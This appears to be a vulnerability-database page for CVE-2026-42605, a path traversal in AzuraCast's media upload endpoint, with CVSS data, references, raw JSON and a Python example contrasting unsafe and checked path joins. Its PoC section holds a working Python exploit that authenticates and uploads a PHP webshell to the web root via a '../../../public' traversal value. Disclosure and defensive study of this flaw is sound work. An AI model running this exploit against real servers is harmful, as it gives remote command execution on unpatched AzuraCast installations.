Security Vulnerability Report
CVE-2026-42605 CVSS 8.8 HIGH

CVE-2026-42605

Published: 2026-05-09 20:16:30
Last Modified: 2026-05-11 16:17:33

Description

AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the currentDirectory request parameter in the Flow.js media upload endpoint (POST /api/station/{station_id}/files/upload) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root. This issue has been patched in version 0.23.6.
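As an added illustration (not AzuraCast's code and not the fix from the referenced commit), the Python below contrasts the unchecked join the description implies with a containment check that rejects the traversal value this report describes. The media root is a constructed placeholder path; the check is purely lexical, so if the root can contain symlinks, compare os.path.realpath() results instead.

```python
import posixpath


def unsafe_target_dir(media_root: str, current_directory: str) -> str:
    """Vulnerable pattern (CWE-22): the client-supplied currentDirectory is
    joined onto the station's media root with no containment check, so
    '../' segments walk out of the root."""
    return posixpath.normpath(posixpath.join(media_root, current_directory))


def safe_target_dir(media_root: str, current_directory: str) -> str:
    """Hardened pattern: normalise the requested directory relative to the
    root and refuse anything whose normalised form leaves the root.
    Lexical check only; resolve symlinks first if the root may contain any."""
    if "\0" in current_directory:
        raise ValueError("NUL byte in currentDirectory")
    if posixpath.isabs(current_directory):
        raise ValueError("currentDirectory must be relative to the media root")
    root = posixpath.normpath(media_root)
    candidate = posixpath.normpath(posixpath.join(root, current_directory))
    # Compare whole path components, not string prefixes: a root of /a/b
    # must not accept /a/bc.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"currentDirectory escapes media root: {current_directory!r}")
    return candidate


def is_within_media_root(media_root: str, current_directory: str) -> bool:
    """Boolean wrapper around safe_target_dir for policy checks and tests."""
    try:
        safe_target_dir(media_root, current_directory)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed placeholder root; not AzuraCast's real storage layout.
    media_root = "/var/azuracast/stations/1/media"
    samples = ["podcasts/2026", "", "../../../public", "/etc", "../media_other"]
    for value in samples:
        verdict = "allowed" if is_within_media_root(media_root, value) else "rejected"
        print(f"{value!r:>20}  unsafe -> {unsafe_target_dir(media_root, value)}")
        print(f"{'':>20}  safe   -> {verdict}")
```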

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available for this entry.

Affected versions: AzuraCast < 0.23.6 (fixed in 0.23.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://target-azuracast.com"
station_id = "1"
login_url = f"{target_url}/login"
upload_url = f"{target_url}/api/station/{station_id}/files/upload"
username = "attacker"
password = "password"

# 1. Authenticate to get session
session = requests.Session()
login_data = {"username": username, "password": password}
session.post(login_url, data=login_data)

# 2. Prepare payload (PHP Webshell)
webshell_content = "<?php system($_GET['cmd']); ?>"
files = {
    'file': ('shell.php', webshell_content, 'application/x-php')
}

# 3. Exploit Path Traversal in currentDirectory parameter
# Adjust the number of '../' based on the directory depth
payload_data = {
    'currentDirectory': '../../../public'  # Path traversal to web root
}

# 4. Send upload request
response = session.post(upload_url, files=files, data=payload_data)
if response.status_code == 200:
    print("[+] Exploit successful! Webshell uploaded.")
    print(f"[+] Access your shell at: {target_url}/shell.php?cmd=whoami")
else:
    print("[-] Exploit failed.")
    print(response.text)

References

https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d
https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6
https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j

Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42605", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:30.020", "lastModified": "2026-05-11T16:17:32.603", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the currentDirectory request parameter in the Flow.js media upload endpoint (POST /api/station/{station_id}/files/upload) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root. This issue has been patched in version 0.23.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d", "source": "[email protected]"}, {"url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6", "source": "[email protected]"}, {"url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j", "source": "[email protected]"}, {"url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}